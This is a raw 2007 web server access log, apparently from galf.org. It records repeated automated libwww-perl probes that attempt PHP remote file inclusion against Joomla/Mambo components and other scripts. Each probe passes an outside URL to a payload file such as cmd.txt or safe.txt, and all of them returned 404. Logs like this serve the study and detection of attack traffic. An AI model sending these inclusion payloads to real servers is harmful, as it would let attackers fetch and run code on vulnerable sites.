207.58.166.142 - - [14/Oct/2007:13:01:09 -0700] "GET /logs/access_070826.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.74.144.87 - - [14/Oct/2007:13:01:38 -0700] "GET /logs/access.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:08 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:19 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.53.196.242 - - [14/Oct/2007:13:02:19 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.150.231.32 - - [14/Oct/2007:13:02:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:38 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.196.242 - - [14/Oct/2007:13:02:39 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.fafip.edu.br/templates_c/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:13:02:51 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:13:02:52 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:02:55 -0700] "GET /logs/access_070826.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [14/Oct/2007:13:02:55 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [14/Oct/2007:13:02:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:03:15 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:03:15 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:03:16 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.58.169.218 - - [14/Oct/2007:13:03:31 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.flenj.org/Scripts/Readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.218 - - [14/Oct/2007:13:03:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.flenj.org/Scripts/Readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.169.218 - - [14/Oct/2007:13:03:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.flenj.org/Scripts/Readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.67.244.181 - - [14/Oct/2007:13:03:32 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
211.108.60.242 - - [14/Oct/2007:13:03:33 -0700] "GET /logs/access_070730.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:03:43 -0700] "GET /logs/access_070723.log/index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:03:43 -0700] "GET /index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:03:44 -0700] "GET /logs/index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.169.218 - - [14/Oct/2007:13:04:12 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.flenj.org/Scripts/Readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:04:42 -0700] "GET /logs/access_070826.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:04:43 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:04:53 -0700] "GET /logs/access_070826.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:13:05:58 -0700] "GET /logs/access_070723.log/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:13:05:59 -0700] "GET /index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:13:05:59 -0700] "GET /logs/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:13:06:13 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:13:06:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:13:06:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:13:06:40 -0700] "GET /logs/access_070917.log/modules/My_eGallery/index.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.246.39.80 - - [14/Oct/2007:13:07:03 -0700] "GET /logs/access_070813.log/index2.php?cmd=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [14/Oct/2007:13:07:04 -0700] "GET /index2.php?cmd=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [14/Oct/2007:13:07:04 -0700] "GET /logs/index2.php?cmd=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:07:30 -0700] "GET /logs/access_070826.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.30.160.11 - - [14/Oct/2007:13:07:41 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.30.160.11 - - [14/Oct/2007:13:07:41 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.30.160.11 - - [14/Oct/2007:13:07:41 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.29.4.54 - - [14/Oct/2007:13:07:49 -0700] "GET /logs/access_070924.log/oneadmin/config.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.4.54 - - [14/Oct/2007:13:07:54 -0700] "GET /oneadmin/config.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.4.54 - - [14/Oct/2007:13:08:01 -0700] "GET /logs/oneadmin/config.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:09:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:09:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:09:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [14/Oct/2007:13:09:59 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:10:16 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:10:27 -0700] "GET /logs/access_070826.log/modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [14/Oct/2007:13:10:28 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:10:28 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.44.172.10 - - [14/Oct/2007:13:10:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.diteaweb.com/templates/README.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.172.10 - - [14/Oct/2007:13:10:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.diteaweb.com/templates/README.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:13:11:03 -0700] "GET /logs/access_070730.log/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
194.30.160.11 - - [14/Oct/2007:13:12:08 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.230.7 - - [14/Oct/2007:13:12:36 -0700] "GET //login.php?dir=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:12:41 -0700] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
61.67.192.15 - - [14/Oct/2007:13:12:50 -0700] "GET /logs/access_070716.log/index.php?file=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:13:12:50 -0700] "GET /index.php?file=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:13:12:50 -0700] "GET /logs/index.php?file=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:13:13:16 -0700] "GET /logs/access_070625.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.58.49.65 - - [14/Oct/2007:13:13:42 -0700] "GET /logs/access_070625.log/!scanhttp://www.unidata-gmbh.de/jusos/modules/My_eGallery/gallery/324.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:13:13:42 -0700] "GET /logs/access_070723.log/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
161.58.49.65 - - [14/Oct/2007:13:13:42 -0700] "GET /!scanhttp://www.unidata-gmbh.de/jusos/modules/My_eGallery/gallery/324.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
161.58.49.65 - - [14/Oct/2007:13:13:42 -0700] "GET /logs/!scanhttp://www.unidata-gmbh.de/jusos/modules/My_eGallery/gallery/324.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.49.65 - - [14/Oct/2007:13:13:48 -0700] "GET /logs/access_070917.log/!scanhttp://www.unidata-gmbh.de/jusos/modules/My_eGallery/gallery/324.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:13:14:01 -0700] "GET /logs/access_070820.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
210.142.176.5 - - [14/Oct/2007:13:15:49 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.rossianka.spb.ru/.../safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.galf.org"
210.142.176.5 - - [14/Oct/2007:13:15:50 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.rossianka.spb.ru/.../about.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.galf.org"
210.142.176.5 - - [14/Oct/2007:13:15:50 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.rossianka.spb.ru/.../safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.galf.org"
210.142.176.5 - - [14/Oct/2007:13:15:50 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.rossianka.spb.ru/.../about.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.galf.org"
66.11.230.7 - - [14/Oct/2007:13:16:14 -0700] "GET //skin/zero_vote/error.php?dir=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:16:38 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:16:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:16:39 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:13:16:46 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:13:16:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:13:16:47 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.199.228.22 - - [14/Oct/2007:13:16:51 -0700] "GET /content.php?inc=http://www.vakinfo.hu/kepeslap/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:13:17:27 -0700] "GET /logs/access_070826.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
217.17.17.82 - - [14/Oct/2007:13:17:34 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:17:51 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:17:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:17:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:17:54 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:17:54 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:17:54 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:13:18:03 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:18:06 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:18:14 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:18:14 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:13:18:14 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:13:18:47 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
12.160.216.29 - - [14/Oct/2007:13:19:51 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.160.216.29 - - [14/Oct/2007:13:19:52 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.151.88.7 - - [14/Oct/2007:13:20:31 -0700] "GET /logs//forum//language/lang_german/lang_main_album.php?=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.151.88.7 - - [14/Oct/2007:13:20:31 -0700] "GET //forum//language/lang_german/lang_main_album.php?=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.23.164 - - [14/Oct/2007:13:20:36 -0700] "GET /logs/?M=A HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:13:20:40 -0700] "GET /logs/access_070723.log//index.php?pagina=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:13:20:40 -0700] "GET //index.php?pagina=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.166.142 - - [14/Oct/2007:13:20:40 -0700] "GET /logs//index.php?pagina=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:20:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [14/Oct/2007:13:20:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:13:21:23 -0700] "GET /logs/access_070806.log//index.php?pagina=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.226.79.133 - - [14/Oct/2007:13:22:35 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pinkfloydonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.213.246.61 - - [14/Oct/2007:13:23:02 -0700] "GET /logs/access.log//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.213.246.61 - - [14/Oct/2007:13:23:02 -0700] "GET //components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.213.246.61 - - [14/Oct/2007:13:23:02 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.213.246.61 - - [14/Oct/2007:13:23:03 -0700] "GET /logs/access_070917.log//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:23:04 -0700] "GET /logs/access_070625.log%20%20//mambots/editors/jce/jscripts/joomla.php?mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
211.108.60.242 - - [14/Oct/2007:13:23:42 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:23:42 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:23:42 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.8.182.14 - - [14/Oct/2007:13:25:15 -0700] "GET /logs/access.log//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.8.182.14 - - [14/Oct/2007:13:25:16 -0700] "GET //components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.8.182.14 - - [14/Oct/2007:13:25:16 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.8.182.14 - - [14/Oct/2007:13:25:16 -0700] "GET /logs/access_070917.log//components/com_minibb.php?absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
